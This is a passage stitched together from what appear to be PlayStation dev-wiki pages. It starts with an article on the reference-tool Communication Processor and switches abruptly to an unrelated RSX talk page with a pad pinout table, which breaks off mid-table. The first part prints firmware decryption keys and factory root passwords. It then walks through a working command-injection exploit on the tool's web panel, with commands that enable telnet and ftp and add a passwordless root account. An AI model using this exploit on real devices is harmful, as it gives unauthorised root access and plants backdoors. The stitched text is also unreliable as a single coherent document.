The PSP DTP-T1000 unit also sports a communication processor but it does not come as a separate board, the hardware is integrated/soldered directly to the motherboard, unlike the PS3 CP, it does not run the firmware from RAM (the PS3 CP copies the firmware from ROM to RAM at boot so changes are, by default not persistant) and therefore writes files directly to flash.<br /> <br /> CEB units feature a PCI slot capable of harboring a CP daughterboard (Sony used such setups as System Debuggers before DEH units came along), CP boards switched to a proprietary interface and shipped to 3rd parties starting with DEH-Rx<br /> <br /> == Software ==<br /> <br /> === De/Encrypt Communication Processor updates ===<br /> This is how to decrypt/encrypt Playstation 3 Reference Tool Communication Processor updates. (use this knowledge wisely)<br /> <br /> This was achieved by exploiting the communication processor firmware and gaining root privileges on the running Montavista Linux.<br /> The key for the CP update packages is located within the toolupdatedec binary located at /usr/local/sony/bin/toolupdatedec<br /> <br /> The update packages are just tar.gz packages encrypted using AES256CBC Here is the syntax to decrypt them :<br /> <br /> * The first 16 bytes of the package is the IV, the Second 16 bytes is the MD5 hash of the decrypted package.<br /> <br /> So use this Syntax after skipping the first 32 bytes of the file: <br /> <br /> {{keyboard|content=openssl aes-256-cbc -in reftool_cp_xxx.bin -K E8ED2B817207B70C5DF9090507AF2A8982967620D692B92A59231638402DF13F -iv the_first_16_bytes_of_the_file -d &gt; dec.tgz<br /> }}<br /> <br /> PSP Hardware Tool Updates use the very same encryption but a different key inside the toolupdatedec binary.<br /> <br /> The key to these units has also been dumped, here is the syntax to decrypt psp Hardware Tool Update for DTP-T1000<br /> <br /> {{keyboard|content=openssl aes-256-cbc -in psptoolupdate.bin -K A400C48628A7A5294D11AE3BB2587AEA32E501C63E49D1DCAA19B5AEB092F3DB -iv the_first_16_bytes_of_the_file -d &gt; dec.tgz<br /> }}<br /> <br /> P.S. If you have any trouble extracting the tarballs, try using Linux.<br /> <br /> - Mathieulh<br /> <br /> Because a picture is worth a thousand words, here is one: <br /> &lt;gallery&gt;<br /> File:CP_ROOT.jpg|Root on the Communication Processor<br /> &lt;/gallery&gt;<br /> <br /> === Proper De/Encrypting of CP Updates ===<br /> *source code [http://gitorious.ps3dev.net/cp-update-crypt cp-update-crypt] [[Gitorious]]<br /> <br /> == Exploiting the Communication Processor ==<br /> <br /> After initially deciding not to release the cgi exploit in case Sony may release yet another hardware based on the [[CXD9790GG]] MIPS processor, no such hardware (to my knowledge) ever came out; thus I am now documenting this exploit:<br /> <br /> &lt;div style=&quot;border: 5px solid red; padding: 5px;&quot;&gt;<br /> '''Editor's note:''' The following &lt;html&gt; code has been edited for a better experience through displaying on this wiki page. The following has ben replaced... ([[User:Roxanne|Roxanne]] ([[User talk:Roxanne|talk]]) - 03&lt;sup&gt;rd&lt;/sup&gt; March 2016 - 21:50 GMT+1)<br /> * &lt;nowiki&gt;&lt;source lang=&quot;xml&quot;&gt; instead of &lt;pre&gt;&lt;/nowiki&gt;<br /> * &lt;nowiki&gt;&lt;title&gt;Save and load&lt;/title&gt; instead of &lt;title&gt;Save &amp; load&lt;/title&gt;&lt;/nowiki&gt;<br /> * &lt;nowiki&gt;&lt;div class=&quot;title&quot;&gt;Save and load&lt;/div&gt; instead of &lt;div class=&quot;title&quot;&gt;Save &amp; load&lt;/div&gt;&lt;/nowiki&gt;<br /> <br /> View here to look for the original code... (by [[User:Mathieulh|Mathieulh]])<br /> * http://www.psdevwiki.com/ps3/index.php?title=Communication_Processor&amp;oldid=41067#Exploting_the_Communication_Processor<br /> * http://www.psdevwiki.com/ps3/index.php?title=Communication_Processor&amp;oldid=41073#Exploting_the_Communication_Processor<br /> &lt;/div&gt;<br /> <br /> === Step 1 - The Development Tool Web panel ===<br /> <br /> The first thing you want to do, assuming you already have your Development Tool properly setup, is to go to this page http://devtool/cgi-bin/admin/save_setting.cgi?lang=english (you will want to replace &quot;devtool&quot; by the ip/hostname of your Development Tool), you may also reach this page by simply<br /> going to the &quot;Save &amp; load&quot; page of your tool's panel.<br /> <br /> This page is actually the front end for a cgi script that can be used to save and/or load your development tool's configuration settings into/from a file. <br /> Once on the page, it is fairly easy to do a right click on your favorite web browser and save it as source, assuming you did not mistakenly save the top.cgi page instead, this is the result you should get: <br /> <br /> &lt;source lang=&quot;xml&quot;&gt;<br /> &lt;html&gt;<br /> &lt;head&gt;<br /> &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=iso-8859-1&quot;&gt;<br /> &lt;title&gt;Save and load&lt;/title&gt;<br /> &lt;link rel=&quot;stylesheet&quot; href=&quot;/style.css&quot;&gt;<br /> &lt;/head&gt;<br /> &lt;body&gt;<br /> &lt;div class=&quot;title&quot;&gt;Save and load&lt;/div&gt;<br /> &lt;div class=&quot;abstract&quot;&gt;Download of the current settings or upload of setting with a file.&lt;/div&gt;&lt;br&gt;&lt;hr&gt;<br /> &lt;div class=&quot;contents&quot;&gt;<br /> &lt;form action=&quot;save_setting.cgi?lang=english&quot; method=&quot;post&quot;<br /> enctype=&quot;multipart/form-data&quot;&gt;<br /> Save setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;<br /> Setting file<br /> &lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;a href=&quot;/var/ps3tool.conf&quot;&gt;<br /> ps3tool.conf<br /> &lt;/a&gt;<br /> &lt;br&gt;<br /> (Right-click and then select a menu like [Save Target As] on your browser.)<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;hr&gt;<br /> Upload setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;<br /> Setting file<br /> &lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;input type=&quot;file&quot; name=&quot;setting&quot;&gt;<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;div align=&quot;center&quot;&gt;<br /> &lt;input type=&quot;submit&quot; name=&quot;confirm&quot; value=&quot;Setting&quot;&gt;<br /> &lt;/div&gt;<br /> &lt;/form&gt;<br /> &lt;/div&gt;<br /> &lt;hr&gt;<br /> &lt;a href=&quot;/cgi-bin/contents.cgi?lang=english&quot;&gt;<br /> Top<br /> &lt;/a&gt;<br /> &lt;!--<br /> &amp;nbsp;<br /> &lt;a href=&quot;/help/english/save_setting.html&quot; target=&quot;_blank&quot;&gt;<br /> Help<br /> &lt;/a&gt;<br /> --&gt;<br /> &lt;/body&gt;<br /> &lt;/html&gt;<br /> &lt;/source&gt;<br /> <br /> <br /> Besides the obvious security hazard in the fact that the httpd service runs as root, the exploit itself still remains hidden unless you get the whole save_setting.cgi file and look into the save_setting_file and the rename_settingfile functions (I'll let you dig into these deeper in your own time)<br /> <br /> === Step 2 - Doing simple modifications ===<br /> <br /> Assuming you have saved the right source to your computer, you then need, for this exploit to work, to perform small modifications to those <br /> <br /> What you really want to modify is this part: <br /> &lt;pre&gt;<br /> &lt;input type=&quot;file&quot; name=&quot;setting&quot;&gt;<br /> &lt;/pre&gt;<br /> <br /> Into this part: <br /> &lt;pre&gt;<br /> &lt;input type=&quot;text&quot; name=&quot;setting&quot;&gt;<br /> &lt;/pre&gt;<br /> <br /> As you can see, the change is subtle, but it allows you input actual text instead of sending a file<br /> <br /> Of course since you are not going to use this modified page from the actual Communication Processor's web panel, you need to perform a few more obvious changes to the page (you need to put the hard path to hyperlinks to the .cgi and .conf files)<br /> So, change all the hyperlinks to their full path, for example '''action=&quot;save_setting.cgi?lang=english&quot;''' becomes '''action=&lt;nowiki&gt;&quot;http://DEVTOOL.IP.HERE/cgi-bin/admin/save_setting.cgi?lang=english&quot;&lt;/nowiki&gt;'''<br /> <br /> To the lazy ones, this is what the result should look like (change the hyperlinks accordingly)<br /> <br /> &lt;source lang=&quot;xml&quot;&gt;<br /> &lt;html&gt;<br /> &lt;head&gt;<br /> &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=iso-8859-1&quot;&gt;<br /> &lt;title&gt;Save and load&lt;/title&gt;<br /> &lt;link rel=&quot;stylesheet&quot; href=&quot;/style.css&quot;&gt;<br /> &lt;/head&gt;<br /> &lt;body&gt;<br /> &lt;div class=&quot;title&quot;&gt;Save and load&lt;/div&gt;<br /> &lt;div class=&quot;abstract&quot;&gt;Download of the current settings or upload of setting with a file.&lt;/div&gt;&lt;br&gt;&lt;hr&gt;<br /> &lt;div class=&quot;contents&quot;&gt;<br /> &lt;form action=&quot;http://DEVTOOL.IP.HERE/cgi-bin/admin/save_setting.cgi?lang=english&quot; method=&quot;post&quot;<br /> enctype=&quot;multipart/form-data&quot;&gt;<br /> Save setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;<br /> Setting file<br /> &lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;a href=&quot;http://DEVTOOL.IP.HERE/var/ps3tool.conf&quot;&gt;<br /> ps3tool.conf<br /> &lt;/a&gt;<br /> &lt;br&gt;<br /> (Right-click and then select a menu like [Save Target As] on your browser.)<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;hr&gt;<br /> Upload setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;<br /> Setting file<br /> &lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;input type=&quot;text&quot; name=&quot;setting&quot;&gt;<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;div align=&quot;center&quot;&gt;<br /> &lt;input type=&quot;submit&quot; name=&quot;confirm&quot; value=&quot;Setting&quot;&gt;<br /> &lt;/div&gt;<br /> &lt;/form&gt;<br /> &lt;/div&gt;<br /> &lt;hr&gt;<br /> &lt;a href=&quot;http://DEVTOOL.IP.HERE/cgi-bin/contents.cgi?lang=english&quot;&gt;<br /> Top<br /> &lt;/a&gt;<br /> &lt;!--<br /> &amp;nbsp;<br /> &lt;a href=&quot;/help/english/save_setting.html&quot; target=&quot;_blank&quot;&gt;<br /> Help<br /> &lt;/a&gt;<br /> --&gt;<br /> &lt;/body&gt;<br /> &lt;/html&gt;<br /> &lt;/source&gt;<br /> <br /> &lt;!-- waiting for approval... if not good/working just delete it<br /> {{Boxcode|content=&lt;syntaxhighlight lang=&quot;html5&quot;&gt;<br /> &lt;html&gt;<br /> &lt;head&gt;<br /> &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=iso-8859-1&quot;&gt;<br /> &lt;title&gt;Save &amp;amp; load&lt;/title&gt;<br /> &lt;link rel=&quot;stylesheet&quot; href=&quot;/style.css&quot;&gt;<br /> &lt;/head&gt;<br /> &lt;body&gt;<br /> &lt;div class=&quot;title&quot;&gt;Save &amp;amp; load&lt;/div&gt;<br /> &lt;div class=&quot;abstract&quot;&gt;Download of the current settings or upload of setting with a file.&lt;/div&gt;<br /> &lt;br&gt;<br /> &lt;hr&gt;<br /> &lt;div class=&quot;contents&quot;&gt;<br /> &lt;form action=&quot;http://192.168.0.3/cgi-bin/admin/save_setting.cgi?lang=english&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;<br /> Save setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;Setting file&lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;a href=&quot;http://192.168.0.3/var/ps3tool.conf&quot;&gt;ps3tool.conf&lt;/a&gt;<br /> &lt;br&gt;<br /> (Right-click and then select a menu like [Save Target As] on your browser.)<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;hr&gt;<br /> Upload setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;Setting file&lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;input type=&quot;file&quot; name=&quot;setting&quot;&gt;<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;hr&gt;<br /> Send text command<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;Text command&lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;input type=&quot;text&quot; name=&quot;setting&quot;&gt;<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;div align=&quot;center&quot;&gt;<br /> &lt;input type=&quot;submit&quot; name=&quot;confirm&quot; value=&quot;Setting&quot;&gt;<br /> &lt;/div&gt;<br /> &lt;/form&gt;<br /> &lt;/div&gt;<br /> &lt;hr&gt;<br /> &lt;a href=&quot;http://192.168.0.3/cgi-bin/contents.cgi?lang=english&quot;&gt;Top&lt;/a&gt;<br /> &lt;/body&gt;<br /> &lt;/html&gt;<br /> &lt;/syntaxhighlight&gt;}}<br /> --&gt;<br /> <br /> === Step 3 - Profit ! ===<br /> <br /> You should now have a place in which you can input text in the page itself, the exploit works as follows, any command you sent (by pressing on the &quot;Setting&quot; button) preceded by &quot;; &quot; (do not include the quotes) will run as root on the Communication Processor, so here are the obvious commands you need to input in order to gain telnet and ftp access as well as to add a root account to the unit:<br /> <br /> Add a line to start telnet in inetd.conf (on DECR-1000 the line already exists in the original file but is commented; on DTP-T1000 telnet is enabled by default so this command is not required.)<br /> {{keyboard|content=; echo &gt;&gt;/etc/inetd.conf telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd }} <br /> Add a line to start ftpd in inetd.conf<br /> {{keyboard|content=; echo &gt;&gt;/etc/inetd.conf ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd }}<br /> Restart inetd to apply the above changes<br /> {{keyboard|content=; /etc/init.d/inetd restart }}<br /> Add an account called rt with root privileges and no password to the passwd file (alternatively on the DECR-1000 Communication Processor you may ignore this step and log in with the root account and the password cytology on the DTP-T1000 the password to the root account is tAchyOn )<br /> {{keyboard|content=; echo &gt;&gt;/etc/passwd rt::0:0:root:/root:/bin/bash }}<br /> <br /> You may also output files given the right path (if you don't want to mess with ftp) the below example creates a ls.txt file containing a listing of all files on the CP at the Development panel's root<br /> {{keyboard|content=; ls -alR /* &gt; /usr/local/sony/www/html/ls.txt }}<br /> <br /> While sending all these commands (by clicking on the &quot;Setting&quot; button), the Development Tool's panel will send you an error message, this is normal (given the nature of the exploit) and can be ignored, just follow with the next commands until you have achieved your expected goal.<br /> <br /> Once you have dumped the development tool panel's files, or extracted those from updates, the exploit should be fairly obvious to you. Of course when this exploit was first discovered, we had no previous access to the files on the Communication Processor and had to initially take another route, which was to dump the Communication Processor's bootrom using hardware (the chip sits on a socket), discover and use the diagnostic panel/shell on it, find a way out of its sandbox and send (through very slow serial outputs) the content of the Communication Processor's memory (as it was running live), which incidentally contained a whole copy of the file system and allowed to look for an easier way in, eventually the toolupdatedec files from both the DTP-T1000 and TCP-520 (DECR-1000 CP) was dumped using this exploit, allowing to retrieve the keys and algorithms used to decrypt Communication Processor/Hardware Tool updates.<br /> <br /> === Fun scripts to try ===<br /> <br /> ==== backup_mode.sh ====<br /> <br /> &lt;pre&gt;<br /> #!/bin/bash<br /> echo -n 0 &gt; /proc/ps3tool_gpio/SC_PI0_DIPSW<br /> echo -n 0 &gt; /proc/ps3tool_gpio/SC_RSTX<br /> sleep 1<br /> echo -n 1 &gt; /proc/ps3tool_gpio/SC_RSTX<br /> &lt;/pre&gt;<br /> <br /> * sets DECR in backup mode<br /> * scver in backup mode is v0.4.5_b4!<br /> <br /> ==== normal_mode.sh ====<br /> <br /> &lt;pre&gt;<br /> #!/bin/bash<br /> echo -n 1 &gt; /proc/ps3tool_gpio/SC_PI0_DIPSW<br /> echo -n 0 &gt; /proc/ps3tool_gpio/SC_RSTX<br /> sleep 1<br /> echo -n 1 &gt; /proc/ps3tool_gpio/SC_RSTX<br /> &lt;/pre&gt;<br /> <br /> * sets DECR in normal mode<br /> <br /> ==== sc_soft_reset.sh ====<br /> <br /> &lt;pre&gt;<br /> #!/bin/bash<br /> echo -n 0 &gt; /proc/ps3tool_gpio/SC_RSTX<br /> sleep 1<br /> echo -n 1 &gt; /proc/ps3tool_gpio/SC_RSTX<br /> &lt;/pre&gt;<br /> <br /> * soft resets SYSCON<br /> <br /> ==== update.sh ====<br /> <br /> &lt;pre&gt;<br /> #!/bin/bash<br /> <br /> function mode() { # 0 = backup mode, 1 = normal mode<br /> printf &quot;$1&quot; &gt; /proc/ps3tool_gpio/SC_PI0_DIPSW<br /> # reset sc<br /> printf &quot;0&quot; &gt; /proc/ps3tool_gpio/SC_RSTX<br /> sleep 1<br /> printf &quot;1&quot; &gt; /proc/ps3tool_gpio/SC_RSTX<br /> # wait for sc to be ready<br /> sleep 2<br /> }<br /> <br /> function command() {<br /> printf &quot;${1}\r\n&quot; &gt; /dev/ttyS0 <br /> }<br /> <br /> # do NOT use this while sx is running, instead use e.g. socat<br /> function print_uart() {<br /> while IFS= read -r -d $'\0' -n 1 LINE; do<br /> printf &quot;%c&quot; &quot;$LINE&quot;<br /> done &lt; /dev/ttyS0<br /> unset IFS<br /> }<br /> <br /> if ! [[ &quot;$1&quot; == /* ]]; then<br /> echo &quot;ERROR: Firmware update file path has to be absolute!&quot;<br /> exit 1 <br /> fi<br /> <br /> if [ ! -f $1 ]; then<br /> echo &quot;ERROR: Firmware update file not found!&quot;<br /> exit 1<br /> fi<br /> <br /> <br /> wait /usr/local/sony/bin/be_shutdown &amp;&gt;/dev/null<br /> <br /> killall scuartd &amp;&gt;/dev/null<br /> command &quot;halt&quot;<br /> sleep 2<br /> <br /> mode 0<br /> <br /> command &quot;firmud&quot;<br /> sleep 2<br /> /usr/bin/sx $1 &lt; /dev/ttyS0 &gt; /dev/ttyS0 &amp;<br /> wait $!<br /> <br /> printf &quot;\n----- Press any key after \'completed!! [mullion]\$\' -----\n&quot;<br /> print_uart &amp;<br /> pid=$!<br /> read -n 1 -s # wait for key<br /> printf &quot;\n&quot;<br /> kill $pid<br /> <br /> mode 1<br /> <br /> /usr/local/sony/bin/scuartd &amp; &amp;&gt;/dev/null<br /> &lt;/pre&gt;<br /> <br /> * Updates SYSCON firmware. Can works sometimes with corrupt firmware. Needs one parameter (absolute path to syscon firmware)<br /> <br /> {{Console Components}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Talk:RSX&diff=46046 Talk:RSX 2017-09-02T17:11:49Z <p>Mathieulh: /* Rom Versions */ Added some consoles of mine</p> <hr /> <div>Does anyone have any info on the supposedly broken scaler? [[User:Asdfsfs|Asdfsfs]] ([[User talk:Asdfsfs|talk]]) 00:59, 15 April 2016 (UTC)<br /> <br /> Info request:<br /> *Pad/Pinouts are unknown (just as from Cell)<br /> *Pictures of RSX and pictures of the PCB under the RSX would be nice to add.<br /> <br /> <br /> &lt;pre&gt;<br /> 1 +1.8V RSX_PLL_VDD 7 style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_PLL_VDD<br /> 2 +1.2V RSX_VDDC 6 style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDC<br /> 3 +1.2V RSX_VDDR 5 style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> 4 +1.2V YC_RC_VDDIO 4 style=&quot;color:white; background-color:#993333;&quot; | +1.2V YC_RC_VDDIO<br /> 5 +1.5V RSX_RC_VDDA 3 style=&quot;color:white; background-color:#cc3333;&quot; | +1.5V RSX_RC_VDDA <br /> 6 +1.5V RSX_VDDIO 2 style=&quot;color:white; background-color:#cc3333;&quot; | +1.5V RSX_VDDIO<br /> 7 +1.8V RSX_FBVDDQ 1 style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> <br /> Ground style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> &lt;/pre&gt;&lt;!--// embedded table cell Style used for power ^ ^ ^ //--&gt;<br /> <br /> &lt;div style=&quot;height:750px; overflow:auto&quot;&gt;<br /> {| border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;5&quot; border=&quot;#999&quot; class=&quot;wikitable&quot; style=&quot;border:1px solid #999; border-collapse: collapse;&quot; <br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | A<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | A3 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A4 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A5 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A6 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A7 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A8 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A9 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A10 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A11 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A12 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A13 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A14 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A15 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A16 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A17 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A18 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A19 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A20 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A21 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A22 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A23 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A24 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A25 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A26 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A27 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A28 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A29 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A30 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A31 || VSSMON || &amp;gt; RSX_VSSMON<br /> |-<br /> | A34 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | A35 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | A36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | A37 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | A38 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | A39 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | B<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | B2 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B3 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B4 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B5 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B6 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B7 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B8 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B9 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B10 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B11 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B12 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B13 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B14 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B15 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B16 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B17 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B18 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B19 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B20 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B21 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B22 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B23 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B24 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B25 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B26 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B27 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B28 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B29 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B30 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B31 || VDDMON || &amp;gt; RSX_VDDMONI<br /> |-<br /> | B32 || 